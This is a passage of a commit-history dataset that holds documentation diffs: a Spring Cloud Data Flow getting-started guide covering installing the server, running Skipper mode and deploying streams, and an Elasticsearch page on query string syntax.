pring-cloud-data","old_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/getting-started.adoc","new_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/getting-started.adoc","new_contents":"[[getting-started]]\n= Getting started\n\n[partintro]\n--\nIf you're just getting started with Spring Cloud Data Flow, this is the section\nfor you! Here we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions. You'll\nfind a gentle introduction to Spring Cloud Data Flow along with installation instructions.\nWe'll then build our first Spring Cloud Data Flow application, discussing some core principles as\nwe go.\n--\n\n[[getting-started-system-requirements]]\n== System Requirements\n\nYou need Java installed (Java 8 or later), and to build, you need to have Maven installed as well.\n\nYou need to have an RDBMS for storing stream, task and app states in the database. The `local` Data Flow server by default uses embedded H2 database for this.\n\nYou also need to have link:https:\/\/redis.io[Redis] running if you are running any streams that involve analytics applications. Redis may also be required run the unit\/integration tests.\n\nFor the deployed streams and tasks to communicate, either link:http:\/\/www.rabbitmq.com[RabbitMQ] or link:http:\/\/kafka.apache.org[Kafka] needs to be installed.\n\n[[getting-started-deploying-spring-cloud-dataflow]]\n== Installation\n\nStarting 1.3.x, the Data Flow Server can run in either `skipper` or `classic` (non-skipper) modes.\nThe modes can be specified when starting the Data Flow server using the property `spring.cloud.dataflow.features.skipper-enabled`.\nBy default, the `classic` mode is enabled.\n\n. Download the Spring Cloud Data Flow Server and Shell apps:\n+\n[source,bash,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-server-local\/{project-version}\/spring-cloud-dataflow-server-local-{project-version}.jar\n\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-shell\/{project-version}\/spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\n. Download http:\/\/cloud.spring.io\/spring-cloud-skipper\/[Skipper] if you would like the added features of upgrading and rolling back Streams since Data Flow delegates to Skipper for those features.\n+\n[source,yaml,options=nowrap,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-server\/{skipper-version}\/spring-cloud-skipper-server-{skipper-version}.jar\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-shell\/{skipper-version}\/spring-cloud-skipper-shell-{skipper-version}.jar\n----\n+\n. Launch Skipper (Required only if you want to run Spring Cloud Data Flow server in `skipper` mode)\n+\nIn the directory where you downloaded skipper, run the server using `java -jar`\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-skipper-server-{skipper-version}.jar\n----\n+\n. Launch the Data Flow Server\n+\nIn the directory where you downloaded Data Flow, run the server using `java -jar`\n+\nTo run the Data Flow server in `classic` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar\n----\n+\nTo run the Data Flow server in `skipper` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar --spring.cloud.dataflow.features.skipper-enabled=true\n----\n+\nIf Skipper and the Data Flow server are not running on the same host, set the configuration property `spring.cloud.skipper.client.serverUri` to the location of Skipper, e.g.\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar --spring.cloud.skipper.client.serverUri=http:\/\/192.51.100.1:7577\/api\n----\n+\n. Launch the Data Flow Shell:\n+\nLaunching the Data Flow shell requires the appropriate data flow server mode to be specified.\nTo start the Data Flow Shell for the Data Flow server running in `classic` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\nTo start the Data Flow Shell for the Data Flow server running in `skipper` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar --dataflow.mode=skipper\n----\n\nNOTE: Both the Data Flow Server and the Shell must be on the same mode.\n\nIf the Data Flow Server and shell are not running on the same host, point the shell to the Data Flow server URL using the `dataflow config server` command when in the shell's interactive mode.\n[source,bash]\n----\nserver-unknown:>dataflow config server http:\/\/198.51.100.0\nSuccessfully targeted http:\/\/198.51.100.0\ndataflow:>\n----\n\nAlternatively, pass in the command line option `--dataflow.uri`. The shell's command line option `--helps shows what is available.\n\n[[getting-started-deploying-streams-spring-cloud-dataflow]]\n== Deploying Streams\n. Import Apps\n+\nBy default, the application registry will be empty.\nLet's register two applications, `http` and `log` that communicate using RabbitMQ.\n+\n```\ndataflow:>app register --name http --type source --uri maven:\/\/org.springframework.cloud.stream.app:http-source-rabbit:1.2.0.RELEASE\nSuccessfully registered application 'source:http'\n\ndataflow:>app register --name log --type sink --uri maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:1.1.0.RELEASE\nSuccessfully registered application 'sink:log'\n```\n+\nFor more details, such as how to register applications that are based on docker containers or use Kafka as the messaging middleware, review the section on how to <<streams.adoc#spring-cloud-dataflow-register-stream-apps, register applications>>.\n+\nNOTE: Depending on your environment, you may need to configure the Data Flow Server to point to a custom\nMaven repository location or configure proxy settings. See <<configuration-maven>> for more information.\n+\nThere are two options for deploying Streams. The \"traditional\" way that Data Flow has always used and a new way that delegates to the Skipper server. Deploying using Skipper will enable you to update and rollback the streams while the traditional way will not.\n+\n. Create Streams without Skipper\n+\nYou can now use the shell commands to list available applications (source\/processors\/sink) and create streams. For example:\n+\n[source,bash]\n----\ndataflow:> stream create --name httptest --definition \"http --server.port=9000 | log\" --deploy\n----\n+\nNOTE: You will need to wait a little while until the apps are actually deployed successfully\nbefore posting data. Look in the log file of the Data Flow server for the location of the log\nfiles for the `http` and `log` applications. Tail the log file for each application to verify\nthe application has started.\n+\nNow post some data\n+\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\nLook to see if `hello world` ended up in log files for the `log` application.\n+\n. Create Streams with Skipper\n+\nYou can now use the shell commands to list available applications (source\/processors\/sink) and create streams. For example:\n+\n[source,bash]\n----\ndataflow:> stream create --name httptest --definition \"http --server.port=9000 | log\"\ndataflow:> stream deploy --name httptest\n----\n+\nNOTE: You will need to wait a little while until the apps are actually deployed successfully\nbefore posting data. Look in the log file of the Skipper server for the location of the log\nfiles for the `http` and `log` applications. Tail the log file for each application to verify\nthe application has started.\n+\nNow post some data\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\nLook to see if `hello world` ended up in log files for the `log` application.\n\nYou can read more about the general features of using Skipper to deploy streams in the section <<spring-cloud-dataflow-stream-lifecycle-skipper>> and how to upgrade and rollback streams in the section <<spring-cloud-dataflow-streams-skipper>>.\n\n[NOTE]\n====\nWhen deploying locally, each app (and each app instance, in case of `count>1`) gets a dynamically assigned `server.port`\nunless you explicitly assign one with `--server.port=x`. In both cases, this setting is propagated as a configuration\nproperty that will override any lower-level setting that you may have used (_e.g._ in `application.yml` files).\n====\n\n== Deploying Tasks\nRefer to the section, <<spring-cloud-dataflow-register-task-apps>>, for an example on how to get started using Tasks in Spring Cloud Data Flow.\n","old_contents":"[[getting-started]]\n= Getting started\n\n[partintro]\n--\nIf you're just getting started with Spring Cloud Data Flow, this is the section\nfor you! Here we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions. You'll\nfind a gentle introduction to Spring Cloud Data Flow along with installation instructions.\nWe'll then build our first Spring Cloud Data Flow application, discussing some core principles as\nwe go.\n--\n\n[[getting-started-system-requirements]]\n== System Requirements\n\nYou need Java installed (Java 8 or later), and to build, you need to have Maven installed as well.\n\nYou need to have an RDBMS for storing stream, task and app states in the database. The `local` Data Flow server by default uses embedded H2 database for this.\n\nYou also need to have link:https:\/\/redis.io[Redis] running if you are running any streams that involve analytics applications. Redis may also be required run the unit\/integration tests.\n\nFor the deployed streams and tasks to communicate, either link:http:\/\/www.rabbitmq.com[RabbitMQ] or link:http:\/\/kafka.apache.org[Kafka] needs to be installed.\n\n[[getting-started-deploying-spring-cloud-dataflow]]\n== Installation\n\nStarting 1.3.x, the Data Flow Server can run in either `skipper` or `classic` (non-skipper) modes.\nThe modes can be specified when starting the Data Flow server using the property `spring.cloud.dataflow.features.skipper-enabled`.\nBy default, the `classic` mode is enabled.\n\n. Download the Spring Cloud Data Flow Server and Shell apps:\n+\n[source,bash,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-server-local\/{project-version}\/spring-cloud-dataflow-server-local-{project-version}.jar\n\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-shell\/{project-version}\/spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\n. Download http:\/\/cloud.spring.io\/spring-cloud-skipper\/[Skipper] if you would like the added features of upgrading and rolling back Streams since Data Flow delegates to Skipper for those features.\n+\n[source,yaml,options=nowrap,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-server\/{skipper-version}\/spring-cloud-skipper-server-{skipper-version}.jar\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-shell\/{skipper-version}\/spring-cloud-skipper-shell-{skipper-version}.jar\n----\n+\n. Launch Skipper (Required only if you want to run Spring Cloud Data Flow server in `skipper` mode)\n+\nIn the directory where you downloaded skipper, run the server using `java -jar`\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-skipper-server-{skipper-version}.jar\n----\n+\n. Launch the Data Flow Server\n+\nIn the directory where you downloaded Data Flow, run the server using `java -jar`\n+\nTo run the Data Flow server in `classic` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar\n----\n+\nTo run the Data Flow server in `skipper` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar --spring.cloud.dataflow.features.skipper-enabled=true\n----\n+\nIf Skipper and the Data Flow server are not running on the same host, set the configuration property `spring.cloud.skipper.client.serverUri` to the location of Skipper, e.g.\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar --spring.cloud.skipper.client.serverUri=http:\/\/192.51.100.1:7577\/api\n----\n+\n. Launch the Data Flow Shell:\n+\nLaunching the Data Flow shell requires the appropriate data flow server mode to be specified.\nTo start the Data Flow Shell for the Data Flow server running in `classic` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\nTo start the Data Flow Shell for the Data Flow server running in `skipper` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar --dataflow.mode=skipper\n----\n\nNOTE: Both the Data Flow Server and the Shell must be on the same mode.\n\nIf the Data Flow Server and shell are not running on the same host, point the shell to the Data Flow server URL:\n[source,bash]\n----\nserver-unknown:>dataflow config server http:\/\/198.51.100.0\nSuccessfully targeted http:\/\/198.51.100.0\ndataflow:>\n----\n\n[[getting-started-deploying-streams-spring-cloud-dataflow]]\n== Deploying Streams\n. Import Apps\n+\nBy default, the application registry will be empty.\nLet's register two applications, `http` and `log` that communicate using RabbitMQ.\n+\n```\ndataflow:>app register --name http --type source --uri maven:\/\/org.springframework.cloud.stream.app:http-source-rabbit:1.2.0.RELEASE\nSuccessfully registered application 'source:http'\n\ndataflow:>app register --name log --type sink --uri maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:1.1.0.RELEASE\nSuccessfully registered application 'sink:log'\n```\n+\nFor more details, such as how to register applications that are based on docker containers or use Kafka as the messaging middleware, review the section on how to <<streams.adoc#spring-cloud-dataflow-register-stream-apps, register applications>>.\n+\nNOTE: Depending on your environment, you may need to configure the Data Flow Server to point to a custom\nMaven repository location or configure proxy settings. See <<configuration-maven>> for more information.\n+\nThere are two options for deploying Streams. The \"traditional\" way that Data Flow has always used and a new way that delegates to the Skipper server. Deploying using Skipper will enable you to update and rollback the streams while the traditional way will not.\n+\n. Create Streams without Skipper\n+\nYou can now use the shell commands to list available applications (source\/processors\/sink) and create streams. For example:\n+\n[source,bash]\n----\ndataflow:> stream create --name httptest --definition \"http --server.port=9000 | log\" --deploy\n----\n+\nNOTE: You will need to wait a little while until the apps are actually deployed successfully\nbefore posting data. Look in the log file of the Data Flow server for the location of the log\nfiles for the `http` and `log` applications. Tail the log file for each application to verify\nthe application has started.\n+\nNow post some data\n+\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\nLook to see if `hello world` ended up in log files for the `log` application.\n+\n. Create Streams with Skipper\n+\nYou can now use the shell commands to list available applications (source\/processors\/sink) and create streams. For example:\n+\n[source,bash]\n----\ndataflow:> stream create --name httptest --definition \"http --server.port=9000 | log\"\ndataflow:> stream deploy --name httptest\n----\n+\nNOTE: You will need to wait a little while until the apps are actually deployed successfully\nbefore posting data. Look in the log file of the Skipper server for the location of the log\nfiles for the `http` and `log` applications. Tail the log file for each application to verify\nthe application has started.\n+\nNow post some data\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\nLook to see if `hello world` ended up in log files for the `log` application.\n\nYou can read more about the general features of using Skipper to deploy streams in the section <<spring-cloud-dataflow-stream-lifecycle-skipper>> and how to upgrade and rollback streams in the section <<spring-cloud-dataflow-streams-skipper>>.\n\n[NOTE]\n====\nWhen deploying locally, each app (and each app instance, in case of `count>1`) gets a dynamically assigned `server.port`\nunless you explicitly assign one with `--server.port=x`. In both cases, this setting is propagated as a configuration\nproperty that will override any lower-level setting that you may have used (_e.g._ in `application.yml` files).\n====\n\n== Deploying Tasks\nRefer to the section, <<spring-cloud-dataflow-register-task-apps>>, for an example on how to get started using Tasks in Spring Cloud Data Flow.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81f0a4abe4503bb88b90cf214d21158174ad4a73","subject":"Docs: Update query-string-syntax.asciidoc","message":"Docs: Update query-string-syntax.asciidoc\n\nCloses #6853\n","repos":"fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch","old_file":"docs\/reference\/query-dsl\/queries\/query-string-syntax.asciidoc","new_file":"docs\/reference\/query-dsl\/queries\/query-string-syntax.asciidoc","new_contents":"[[query-string-syntax]]\n\n==== Query string syntax\n\nThe query string ``mini-language'' is used by the\n<<query-dsl-query-string-query>> and by the\n`q` query string parameter in the <<search-search,`search` API>>.\n\nThe query string is parsed into a series of _terms_ and _operators_. A\nterm can be a single word -- `quick` or `brown` -- or a phrase, surrounded by\ndouble quotes -- `\"quick brown\"` -- which searches for all the words in the\nphrase, in the same order.\n\nOperators allow you to customize the search -- the available options are\nexplained below.\n\n===== Field names\n\nAs mentioned in <<query-dsl-query-string-query>>, the `default_field` is searched for the\nsearch terms, but it is possible to specify other fields in the query syntax:\n\n* where the `status` field contains `active`\n\n status:active\n\n* where the `title` field contains `quick` or `brown`.\n If you omit the OR operator the default operator will be used\n\n title:(quick OR brown)\n title:(quick brown)\n\n* where the `author` field contains the exact phrase `\"john smith\"`\n\n author:\"John Smith\"\n\n* where any of the fields `book.title`, `book.content` or `book.date` contains\n `quick` or `brown` (note how we need to escape the `*` with a backslash):\n\n book.\\*:(quick brown)\n\n* where the field `title` has no value (or is missing):\n\n _missing_:title\n\n* where the field `title` has any non-null value:\n\n _exists_:title\n\n===== Wildcards\n\nWildcard searches can be run on individual terms, using `?` to replace\na single character, and `*` to replace zero or more characters:\n\n qu?ck bro*\n\nBe aware that wildcard queries can use an enormous amount of memory and\nperform very badly -- just think how many terms need to be queried to\nmatch the query string `\"a* b* c*\"`.\n\n[WARNING]\n======\nAllowing a wildcard at the beginning of a word (eg `\"*ing\"`) is particularly\nheavy, because all terms in the index need to be examined, just in case\nthey match. Leading wildcards can be disabled by setting\n`allow_leading_wildcard` to `false`.\n======\n\nWildcarded terms are not analyzed by default -- they are lowercased\n(`lowercase_expanded_terms` defaults to `true`) but no further analysis\nis done, mainly because it is impossible to accurately analyze a word that\nis missing some of its letters. However, by setting `analyze_wildcard` to\n`true`, an attempt will be made to analyze wildcarded words before searching\nthe term list for matching terms.\n\n===== Regular expressions\n\nRegular expression patterns can be embedded in the query string by\nwrapping them in forward-slashes (`\"\/\"`):\n\n name:\/joh?n(ath[oa]n)\/\n\nThe supported regular expression syntax is explained in <<regexp-syntax>>.\n\n[WARNING]\n======\nThe `allow_leading_wildcard` parameter does not have any control over\nregular expressions. A query string such as the following would force\nElasticsearch to visit every term in the index:\n\n \/.*n\/\n\nUse with caution!\n======\n\n===== Fuzziness\n\nWe can search for terms that are\nsimilar to, but not exactly like our search terms, using the ``fuzzy''\noperator:\n\n quikc~ brwn~ foks~\n\nThis uses the\nhttp:\/\/en.wikipedia.org\/wiki\/Damerau-Levenshtein_distance[Damerau-Levenshtein distance]\nto find all terms with a maximum of\ntwo changes, where a change is the insertion, deletion\nor substitution of a single character, or transposition of two adjacent\ncharacters.\n\nThe default _edit distance_ is `2`, but an edit distance of `1` should be\nsufficient to catch 80% of all human misspellings. It can be specified as:\n\n quikc~1\n\n===== Proximity searches\n\nWhile a phrase query (eg `\"john smith\"`) expects all of the terms in exactly\nthe same order, a proximity query allows the specified words to be further\napart or in a different order. In the same way that fuzzy queries can\nspecify a maximum edit distance for characters in a word, a proximity search\nallows us to specify a maximum edit distance of words in a phrase:\n\n \"fox quick\"~5\n\nThe closer the text in a field is to the original order specified in the\nquery string, the more relevant that document is considered to be. When\ncompared to the above example query, the phrase `\"quick fox\"` would be\nconsidered more relevant than `\"quick brown fox\"`.\n\n===== Ranges\n\nRanges can be specified for date, numeric or string fields. Inclusive ranges\nare specified with square brackets `[min TO max]` and exclusive ranges with\ncurly brackets `{min TO max}`.\n\n* All days in 2012:\n\n date:[2012\/01\/01 TO 2012\/12\/31]\n\n* Numbers 1..5\n\n count:[1 TO 5]\n\n* Tags between `alpha` and `omega`, excluding `alpha` and `omega`:\n\n tag:{alpha TO omega}\n\n* Numbers from 10 upwards\n\n count:[10 TO *]\n\n* Dates before 2012\n\n date:{* TO 2012\/01\/01}\n\nCurly and square brackets can be combined:\n\n* Numbers from 1 up to but not including 5\n\n count:[1..5}\n\n\nRanges with one side unbounded can use the following syntax:\n\n age:>10\n age:>=10\n age:<10\n age:<=10\n\n[NOTE]\n===================================================================\nTo combine an upper and lower bound with the simplified syntax, you\nwould need to join two clauses with an `AND` operator:\n\n age:(>=10 AND < 20)\n age:(+>=10 +<20)\n\n===================================================================\n\nThe parsing of ranges in query strings can be complex and error prone. It is\nmuch more reliable to use an explicit <<query-dsl-range-filter,`range` filter>>.\n\n\n===== Boosting\n\nUse the _boost_ operator `^` to make one term more relevant than another.\nFor instance, if we want to find all documents about foxes, but we are\nespecially interested in quick foxes:\n\n quick^2 fox\n\nThe default `boost` value is 1, but can be any positive floating point number.\nBoosts between 0 and 1 reduce relevance.\n\nBoosts can also be applied to phrases or to groups:\n\n \"john smith\"^2 (foo bar)^4\n\n===== Boolean operators\n\nBy default, all terms are optional, as long as one term matches. A search\nfor `foo bar baz` will find any document that contains one or more of\n`foo` or `bar` or `baz`. We have already discussed the `default_operator`\nabove which allows you to force all terms to be required, but there are\nalso _boolean operators_ which can be used in the query string itself\nto provide more control.\n\nThe preferred operators are `+` (this term *must* be present) and `-`\n(this term *must not* be present). All other terms are optional.\nFor example, this query:\n\n quick brown +fox -news\n\nstates that:\n\n* `fox` must be present\n* `news` must not be present\n* `quick` and `brown` are optional -- their presence increases the relevance\n\nThe familiar operators `AND`, `OR` and `NOT` (also written `&&`, `||` and `!`)\nare also supported. However, the effects of these operators can be more\ncomplicated than is obvious at first glance. `NOT` takes precedence over\n`AND`, which takes precedence over `OR`. While the `+` and `-` only affect\nthe term to the right of the operator, `AND` and `OR` can affect the terms to\nthe left and right.\n\n****\nRewriting the above query using `AND`, `OR` and `NOT` demonstrates the\ncomplexity:\n\n`quick OR brown AND fox AND NOT news`::\n\nThis is incorrect, because `brown` is now a required term.\n\n`(quick OR brown) AND fox AND NOT news`::\n\nThis is incorrect because at least one of `quick` or `brown` is now required\nand the search for those terms would be scored differently from the original\nquery.\n\n`((quick AND fox) OR (brown AND fox) OR fox) AND NOT news`::\n\nThis form now replicates the logic from the original query correctly, but\nthe relevance scoring bares little resemblance to the original.\n\nIn contrast, the same query rewritten using the <<query-dsl-match-query,`match` query>>\nwould look like this:\n\n {\n \"bool\": {\n \"must\": { \"match\": \"fox\" },\n \"should\": { \"match\": \"quick brown\" },\n \"must_not\": { \"match\": \"news\" }\n }\n }\n\n****\n\n===== Grouping\n\nMultiple terms or clauses can be grouped together with parentheses, to form\nsub-queries:\n\n (quick OR brown) AND fox\n\nGroups can be used to target a particular field, or to boost the result\nof a sub-query:\n\n status:(active OR pending) title:(full text search)^2\n\n===== Reserved characters\n\nIf you need to use any of the characters which function as operators in your\nquery itself (and not as operators), then you should escape them with\na leading backslash. For instance, to search for `(1+1)=2`, you would\nneed to write your query as `\\(1\\+1\\)=2`.\n\nThe reserved characters are: `+ - && || ! ( ) { } [ ] ^ \" ~ * ? : \\ \/`\n\nFailing to escape these special characters correctly could lead to a syntax\nerror which prevents your query from running.\n\n.Watch this space\n****\nA space may also be a reserved character. For instance, if you have a\nsynonym list which converts `\"wi fi\"` to `\"wifi\"`, a `query_string` search\nfor `\"wi fi\"` would fail. The query string parser would interpret your\nquery as a search for `\"wi OR fi\"`, while the token stored in your\nindex is actually `\"wifi\"`. Escaping the space will protect it from\nbeing touched by the query string parser: `\"wi\\ fi\"`.\n****\n\n===== Empty Query\n\nIf the query string is empty or only contains whitespaces the\nquery string is interpreted as a `no_docs_query` and will yield\nan empty result set. \n","old_contents":"[[query-string-syntax]]\n\n==== Query string syntax\n\nThe query string ``mini-language'' is used by the\n<<query-dsl-query-string-query>> and by the\n`q` query string parameter in the <<search-search,`search` API>>.\n\nThe query string is parsed into a series of _terms_ and _operators_. A\nterm can be a single word -- `quick` or `brown` -- or a phrase, surrounded by\ndouble quotes -- `\"quick brown\"` -- which searches for all the words in the\nphrase, in the same order.\n\nOperators allow you to customize the search -- the available options are\nexplained below.\n\n===== Field names\n\nAs mentioned in <<query-dsl-query-string-query>>, the `default_field` is searched for the\nsearch terms, but it is possible to specify other fields in the query syntax:\n\n* where the `status` field contains `active`\n\n status:active\n\n* where the `title` field contains `quick` or `brown`\n\n title:(quick brown)\n\n* where the `author` field contains the exact phrase `\"john smith\"`\n\n author:\"John Smith\"\n\n* where any of the fields `book.title`, `book.content` or `book.date` contains\n `quick` or `brown` (note how we need to escape the `*` with a backslash):\n\n book.\\*:(quick brown)\n\n* where the field `title` has no value (or is missing):\n\n _missing_:title\n\n* where the field `title` has any non-null value:\n\n _exists_:title\n\n===== Wildcards\n\nWildcard searches can be run on individual terms, using `?` to replace\na single character, and `*` to replace zero or more characters:\n\n qu?ck bro*\n\nBe aware that wildcard queries can use an enormous amount of memory and\nperform very badly -- just think how many terms need to be queried to\nmatch the query string `\"a* b* c*\"`.\n\n[WARNING]\n======\nAllowing a wildcard at the beginning of a word (eg `\"*ing\"`) is particularly\nheavy, because all terms in the index need to be examined, just in case\nthey match. Leading wildcards can be disabled by setting\n`allow_leading_wildcard` to `false`.\n======\n\nWildcarded terms are not analyzed by default -- they are lowercased\n(`lowercase_expanded_terms` defaults to `true`) but no further analysis\nis done, mainly because it is impossible to accurately analyze a word that\nis missing some of its letters. However, by setting `analyze_wildcard` to\n`true`, an attempt will be made to analyze wildcarded words before searching\nthe term list for matching terms.\n\n===== Regular expressions\n\nRegular expression patterns can be embedded in the query string by\nwrapping them in forward-slashes (`\"\/\"`):\n\n name:\/joh?n(ath[oa]n)\/\n\nThe supported regular expression syntax is explained in <<regexp-syntax>>.\n\n[WARNING]\n======\nThe `allow_leading_wildcard` parameter does not have any control over\nregular expressions. A query string such as the following would force\nElasticsearch to visit every term in the index:\n\n \/.*n\/\n\nUse with caution!\n======\n\n===== Fuzziness\n\nWe can search for terms that are\nsimilar to, but not exactly like our search terms, using the ``fuzzy''\noperator:\n\n quikc~ brwn~ foks~\n\nThis uses the\nhttp:\/\/en.wikipedia.org\/wiki\/Damerau-Levenshtein_distance[Damerau-Levenshtein distance]\nto find all terms with a maximum of\ntwo changes, where a change is the insertion, deletion\nor substitution of a single character, or transposition of two adjacent\ncharacters.\n\nThe default _edit distance_ is `2`, but an edit distance of `1` should be\nsufficient to catch 80% of all human misspellings. It can be specified as:\n\n quikc~1\n\n===== Proximity searches\n\nWhile a phrase query (eg `\"john smith\"`) expects all of the terms in exactly\nthe same order, a proximity query allows the specified words to be further\napart or in a different order. In the same way that fuzzy queries can\nspecify a maximum edit distance for characters in a word, a proximity search\nallows us to specify a maximum edit distance of words in a phrase:\n\n \"fox quick\"~5\n\nThe closer the text in a field is to the original order specified in the\nquery string, the more relevant that document is considered to be. When\ncompared to the above example query, the phrase `\"quick fox\"` would be\nconsidered more relevant than `\"quick brown fox\"`.\n\n===== Ranges\n\nRanges can be specified for date, numeric or string fields. Inclusive ranges\nare specified with square brackets `[min TO max]` and exclusive ranges with\ncurly brackets `{min TO max}`.\n\n* All days in 2012:\n\n date:[2012\/01\/01 TO 2012\/12\/31]\n\n* Numbers 1..5\n\n count:[1 TO 5]\n\n* Tags between `alpha` and `omega`, excluding `alpha` and `omega`:\n\n tag:{alpha TO omega}\n\n* Numbers from 10 upwards\n\n count:[10 TO *]\n\n* Dates before 2012\n\n date:{* TO 2012\/01\/01}\n\nCurly and square brackets can be combined:\n\n* Numbers from 1 up to but not including 5\n\n count:[1..5}\n\n\nRanges with one side unbounded can use the following syntax:\n\n age:>10\n age:>=10\n age:<10\n age:<=10\n\n[NOTE]\n===================================================================\nTo combine an upper and lower bound with the simplified syntax, you\nwould need to join two clauses with an `AND` operator:\n\n age:(>=10 AND < 20)\n age:(+>=10 +<20)\n\n===================================================================\n\nThe parsing of ranges in query strings can be complex and error prone. It is\nmuch more reliable to use an explicit <<query-dsl-range-filter,`range` filter>>.\n\n\n===== Boosting\n\nUse the _boost_ operator `^` to make one term more relevant than another.\nFor instance, if we want to find all documents about foxes, but we are\nespecially interested in quick foxes:\n\n quick^2 fox\n\nThe default `boost` value is 1, but can be any positive floating point number.\nBoosts between 0 and 1 reduce relevance.\n\nBoosts can also be applied to phrases or to groups:\n\n \"john smith\"^2 (foo bar)^4\n\n===== Boolean operators\n\nBy default, all terms are optional, as long as one term matches. A search\nfor `foo bar baz` will find any document that contains one or more of\n`foo` or `bar` or `baz`. We have already discussed the `default_operator`\nabove which allows you to force all terms to be required, but there are\nalso _boolean operators_ which can be used in the query string itself\nto provide more control.\n\nThe preferred operators are `+` (this term *must* be present) and `-`\n(this term *must not* be present). All other terms are optional.\nFor example, this query:\n\n quick brown +fox -news\n\nstates that:\n\n* `fox` must be present\n* `news` must not be present\n* `quick` and `brown` are optional -- their presence increases the relevance\n\nThe familiar operators `AND`, `OR` and `NOT` (also written `&&`, `||` and `!`)\nare also supported. However, the effects of these operators can be more\ncomplicated than is obvious at first glance. `NOT` takes precedence over\n`AND`, which takes precedence over `OR`. While the `+` and `-` only affect\nthe term to the right of the operator, `AND` and `OR` can affect the terms to\nthe left and right.\n\n****\nRewriting the above query using `AND`, `OR` and `NOT` demonstrates the\ncomplexity:\n\n`quick OR brown AND fox AND NOT news`::\n\nThis is incorrect, because `brown` is now a required term.\n\n`(quick OR brown) AND fox AND NOT news`::\n\nThis is incorrect because at least one of `quick` or `brown` is now required\nand the search for those terms would be scored differently from the original\nquery.\n\n`((quick AND fox) OR (brown AND fox) OR fox) AND NOT news`::\n\nThis form now replicates the logic from the original query correctly, but\nthe relevance scoring bares little resemblance to the original.\n\nIn contrast, the same query rewritten using the <<query-dsl-match-query,`match` query>>\nwould look like this:\n\n {\n \"bool\": {\n \"must\": { \"match\": \"fox\" },\n \"should\": { \"match\": \"quick brown\" },\n \"must_not\": { \"match\": \"news\" }\n }\n }\n\n****\n\n===== Grouping\n\nMultiple terms or clauses can be grouped together with parentheses, to form\nsub-queries:\n\n (quick OR brown) AND fox\n\nGroups can be used to target a particular field, or to boost the result\nof a sub-query:\n\n status:(active OR pending) title:(full text search)^2\n\n===== Reserved characters\n\nIf you need to use any of the characters which function as operators in your\nquery itself (and not as operators), then you should escape them with\na leading backslash. For instance, to search for `(1+1)=2`, you would\nneed to write your query as `\\(1\\+1\\)=2`.\n\nThe reserved characters are: `+ - && || ! ( ) { } [ ] ^ \" ~ * ? : \\ \/`\n\nFailing to escape these special characters correctly could lead to a syntax\nerror which prevents your query from running.\n\n.Watch this space\n****\nA space may also be a reserved character. For instance, if you have a\nsynonym list which converts `\"wi fi\"` to `\"wifi\"`, a `query_string` search\nfor `\"wi fi\"` would fail. The query string parser would interpret your\nquery as a search for `\"wi OR fi\"`, while the token stored in your\nindex is actually `\"wifi\"`. Escaping the space will protect it from\nbeing touched by the query string parser: `\"wi\\ fi\"`.\n****\n\n===== Empty Query\n\nIf the query string is empty or only contains whitespaces the\nquery string is interpreted as a `no_docs_query` and will yield\nan empty result set. \n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8ed7a4d4421ea8d9610ff469a08517975ca160cc","subject":"Add cross-references to Annotations section of User Guide","message":"Add cross-references to Annotations section of User Guide\n\nThis commit also adds an entry for @RegisterExtension to the 